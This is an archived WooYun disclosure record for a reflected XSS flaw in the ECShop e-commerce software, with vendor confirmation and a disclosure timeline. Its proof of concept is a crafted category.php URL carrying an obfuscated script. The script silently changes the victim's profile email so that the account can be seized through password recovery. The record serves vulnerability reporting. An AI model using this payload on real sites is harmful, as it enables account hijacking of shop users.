"ecshop修改任意用户密码漏洞"的XSS利用

编号401
Urlhttp://www.wooyun.org/bug.php?action=view&id=401
漏洞状态厂商已经确认
漏洞标题"ecshop修改任意用户密码漏洞"的XSS利用
漏洞类型XSS跨站脚本攻击
厂商ShopEx
白帽子blue
提交日期2010-09-02 20:17:00
公开日期2010-10-02 21:00:00
修复时间(not set)
确认时间2010-09-03 00:00:00
Confirm Spend1
漏洞标签反射型xss xss利用技巧
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank8
漏洞简介
目前ecshop存在反射型XSS,可利用,如果二次开发存在XSS或其它CSRF问题,则利用更多。(曾遇此问题,略受其害)
漏洞细节

通过XSS构造post提交个人资料修改,修改为可操作的邮箱,然后密码找回。

POC

http://localhost/test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%22%3E%3Cscript%3Eeval%28String.fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%29%29%3C/script%3E%3C%22


当然,以文件包含的方式利用更简洁

修复方案

见:http://www.wooyun.org/bug.php?action=view&id=395

状态信息 2010-09-02: 细节已通知厂商并且等待厂商处理中
2010-09-03: 厂商已经确认,细节仅向厂商公开
2010-09-06: 细节向第三方安全合作伙伴开放
2010-10-28: 细节向核心白帽子及相关领域专家公开
2010-11-07: 细节向普通白帽子公开
2010-11-17: 细节向实习白帽子公开
2010-10-02: 细节向公众公开
厂商回复过滤不严,正在修复。
回应信息危害等级:中漏洞Rank:8 确认时间:2010-09-03 13:43